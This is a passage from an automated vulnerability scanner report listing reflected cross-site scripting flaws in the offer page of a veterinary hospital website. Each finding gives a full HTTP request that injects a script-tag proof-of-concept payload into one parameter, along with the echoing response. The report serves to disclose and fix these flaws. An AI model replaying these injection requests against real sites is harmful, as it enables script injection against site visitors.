.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:51 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=leokka2dvj8dli9epn3okqvbc4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... /offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49 &phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddre...[SNIP]...
2.72. http://www.vcahospitals.com/main/offer/ [phone parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5b4"><script>alert(1)</script>0df15c3c289 was submitted in the phone parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289 &referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:55 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=4pt8m6oa7m32ci7i96uoh1kn01; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289 &referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d17...[SNIP]...
2.73. http://www.vcahospitals.com/main/offer/ [referer parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43ae"><script>alert(1)</script>6f18be7751f was submitted in the referer parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:14 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14706 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... rm action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f " method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.74. http://www.vcahospitals.com/main/offer/ [state parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce804"><script>alert(1)</script>ee024cf54a8 was submitted in the state parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8 &optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:59 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14690 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8 &optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.75. http://www.vcahospitals.com/main/offer/ [submit parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b158"><script>alert(1)</script>2bba563e314 was submitted in the submit parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314 
&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) 
Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:09 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ga94m4jju2j64t9htmvidu7h93; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314 &token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26gui...[SNIP]...
2.76. http://www.vcahospitals.com/main/offer/ [token parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be60f"><script>alert(1)</script>0efb51ecb80 was submitted in the token parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80 
&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: 
www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:15 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=s4bduitjbvoil74qo6fal13d00; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... lla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80 &tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF...[SNIP]...
2.77. http://www.vcahospitals.com/main/offer/ [tollfree parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5ed"><script>alert(1)</script>e20dadccfe7 was submitted in the tollfree parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7 
&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:20 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ads2nfd0qnf81gp16ap84q27u0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... ble%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7 &uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.19...[SNIP]...
2.78. http://www.vcahospitals.com/main/offer/ [uri parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a040b"><script>alert(1)</script>f73da84759e was submitted in the uri parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b